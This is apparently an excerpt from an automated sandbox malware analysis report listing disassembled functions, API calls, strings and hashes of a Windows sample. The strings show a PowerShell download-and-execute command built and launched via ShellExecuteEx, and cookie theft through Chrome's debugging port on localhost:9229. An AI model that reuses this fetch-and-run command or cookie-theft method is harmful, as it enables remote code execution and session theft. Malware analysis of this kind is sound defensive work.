                                  • Opcode ID: 43f5029d335d8887ecc763c024e9a60a26eb442c497add5bad0f50371c32f8fe
                                  • Instruction ID: 5e0b0715756bda8dc2c3c46ad5c13568126b77a27ce326b61a2ec1dd428d3574
                                  • Opcode Fuzzy Hash: 43f5029d335d8887ecc763c024e9a60a26eb442c497add5bad0f50371c32f8fe
                                  • Instruction Fuzzy Hash: AC711B71E50219ABDB26EB64DC4AFED7774AF48700F404494FA19AF180DF70AF888B64
                                  Function 0035ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32 ref: 0035ABCF
                                  • lstrlen.KERNEL32(00FADA60), ref: 0035ABE5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AC0D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035AC18
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AC41
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AC84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035AC8E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ACB7
                                  • lstrlen.KERNEL32(00374AD4), ref: 0035ACD1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ACF3
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 0035ACFF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AD28
                                  • lstrlen.KERNEL32(00374AD4), ref: 0035AD3A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AD5C
                                  • lstrcat.KERNEL32(00000000,00374AD4), ref: 0035AD68
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AD91
                                  • lstrlen.KERNEL32(00FAD988), ref: 0035ADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035ADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035AE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035AE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035AE6F
                                  • lstrlen.KERNEL32(00000000), ref: 0035AE85
                                  • lstrcpy.KERNEL32(00000000,00FADA78), ref: 0035AEB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: aacd564f48f0427d810315655aba307280429ddd87f869747da9946798aaddd9
                                  • Instruction ID: 14b708b9eb1f39db93ad34625eda00606cb8655d3826d7a9986ddfc3ca670529
                                  • Opcode Fuzzy Hash: aacd564f48f0427d810315655aba307280429ddd87f869747da9946798aaddd9
                                  • Instruction Fuzzy Hash: A7B18F309109169BCB23EF64DC49AAF73F5AF04302F850524BC05EB260DB34ED59EBA1
                                  Function 003647E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,003572A4), ref: 003647E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 003647FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0036480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0036481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 0036482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00364840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00364851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00364862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00364873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00364884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00364895
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: ca704eadfeb2626a174b03e28bc7b92037a0ebe2bca3bac5961c1bfc2c3c8345
                                  • Instruction ID: f9c3229ef1a32d537014d4b0ce723680f6f26939fc7afa61e6e8d35f1a33eca5
                                  • Opcode Fuzzy Hash: ca704eadfeb2626a174b03e28bc7b92037a0ebe2bca3bac5961c1bfc2c3c8345
                                  • Instruction Fuzzy Hash: 1811B471DF1720ABDB259F74BC0DAA93ABCBA25706354481AF55DD2160DBF84088FB60
                                  Function 0035BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035BE53
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035BE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0035BE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035BEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0035BEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0035BEEB
                                  • lstrlen.KERNEL32(')"), ref: 0035BEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 0035BF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0035BF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035BF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0035BF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035BFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 0035C00C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: 883b38480fbf83d0f86b3ad9ecf904d7175a054c83fd0fdf7bcd2876cef8912b
                                  • Instruction ID: 27ee4c938a7a5b5311333cd855f33b8289d13787ed79b3e40fbc684a5043c84a
                                  • Opcode Fuzzy Hash: 883b38480fbf83d0f86b3ad9ecf904d7175a054c83fd0fdf7bcd2876cef8912b
                                  • Instruction Fuzzy Hash: 9461B931E10205ABCB23AFB4AC499AFBBF9AF14301F454425FC09EB251DB34D9599B61
                                  Function 00361820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036184F
                                  • lstrlen.KERNEL32(00F96080), ref: 00361860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003618C1
                                  • lstrlen.KERNEL32(00374FA0), ref: 003618D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003618F4
                                  • lstrcat.KERNEL32(00000000,00374FA0), ref: 00361900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036192F
                                  • lstrlen.KERNEL32(00FA8AA8), ref: 00361945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0036196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003619A6
                                  • lstrlen.KERNEL32(00374FA0), ref: 003619B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003619D9
                                  • lstrcat.KERNEL32(00000000,00374FA0), ref: 003619E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361A14
                                  • lstrlen.KERNEL32(00FA8B18), ref: 00361A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361A8B
                                  • lstrlen.KERNEL32(00FA8B38), ref: 00361AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00361AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00361B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: ee77dfc9597f8436b64d0867aff68f458f77e365e970579e5a7d75b1b6d14049
                                  • Instruction ID: 8557e961e4fe38ba2919de38d4b5d62305b5b2037ce4b388aa8db12f6f24c9d6
                                  • Opcode Fuzzy Hash: ee77dfc9597f8436b64d0867aff68f458f77e365e970579e5a7d75b1b6d14049
                                  • Instruction Fuzzy Hash: B7913171611703AFD7229FB5DC88A2777ECEF14300B598828F88ADB255DB34E895DB60
                                  Function 00354760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003547C5
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354812
                                  • lstrlen.KERNEL32(00374B60), ref: 0035481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035483A
                                  • lstrcat.KERNEL32(00000000,00374B60), ref: 00354846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003548A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003548CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 003548DC
                                  • lstrlen.KERNEL32(?), ref: 003548F0
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003549B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003549E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00354A5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: e8fbd3ff592b5c77f770bf79e7ee2b9eab765bf589113f295d32771504be1ce1
                                  • Instruction ID: 9bb74764a4960a87552eb62eda93722a15e492d0fe111a422dd48166b89a1f0e
                                  • Opcode Fuzzy Hash: e8fbd3ff592b5c77f770bf79e7ee2b9eab765bf589113f295d32771504be1ce1
                                  • Instruction Fuzzy Hash: CBB15C31A112069BCB27EF64E889DAF77E5AF54305F454528FC46AF321DB30EC598BA0
                                  Function 003492B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003490C0: InternetOpenA.WININET(0036CFEC,00000001,00000000,00000000,00000000), ref: 003490DF
                                    • Part of subcall function 003490C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003490FC
                                    • Part of subcall function 003490C0: InternetCloseHandle.WININET(00000000), ref: 00349109
                                  • strlen.MSVCRT ref: 003492E1
                                  • strlen.MSVCRT ref: 003492FA
                                    • Part of subcall function 00348980: std::_Xinvalid_argument.LIBCPMT ref: 00348996
                                  • strlen.MSVCRT ref: 00349399
                                  • strlen.MSVCRT ref: 003493E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 00349547
                                  • lstrcat.KERNEL32(?,00371794), ref: 00349559
                                  • lstrcat.KERNEL32(?,?), ref: 0034956A
                                  • lstrcat.KERNEL32(?,00374B98), ref: 0034957C
                                  • lstrcat.KERNEL32(?,?), ref: 0034958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 0034959F
                                  • lstrlen.KERNEL32(?), ref: 003495B6
                                  • lstrlen.KERNEL32(?), ref: 003495DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00349614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: 56da717adf788a78b34bee850632b90b2348a81b3fc221daccb67e6a281efb52
                                  • Instruction ID: 0c4e1fa6d07b73b2afa7b194e70bc726622e6af6a63667d8d66acded05b36ff4
                                  • Opcode Fuzzy Hash: 56da717adf788a78b34bee850632b90b2348a81b3fc221daccb67e6a281efb52
                                  • Instruction Fuzzy Hash: A7E11871E10218DBDF12DFA8D885ADEBBF5AF48310F5044AAE509AB341DB34AE45CF61
                                  Function 0035D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0035D9A1
                                  • memset.MSVCRT ref: 0035D9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035D9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035DA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035DA1C
                                  • lstrcat.KERNEL32(?,00FADF28), ref: 0035DA36
                                  • lstrcat.KERNEL32(?,?), ref: 0035DA4A
                                  • lstrcat.KERNEL32(?,00FAC578), ref: 0035DA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035DA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0035DA95
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035DAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: 6f4b9e2dd1557a9c204ecaef5c2678b160107d31e09abf406ceaff509c822db0
                                  • Instruction ID: 48c72b8401aa1a2f45ac3fd92a383bf450951186c844c402747f9635aabfb817
                                  • Opcode Fuzzy Hash: 6f4b9e2dd1557a9c204ecaef5c2678b160107d31e09abf406ceaff509c822db0
                                  • Instruction Fuzzy Hash: 8AB19271D102599FCB22EF64DC88DEE77B9AF48301F544565F90AEB250DB30AE48DB60
                                  Function 0034B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0034B330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034B3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B3D9
                                  • lstrlen.KERNEL32(00374C50), ref: 0034B450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B474
                                  • lstrcat.KERNEL32(00000000,00374C50), ref: 0034B480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B4A9
                                  • lstrlen.KERNEL32(00000000), ref: 0034B52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034B557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034B55F
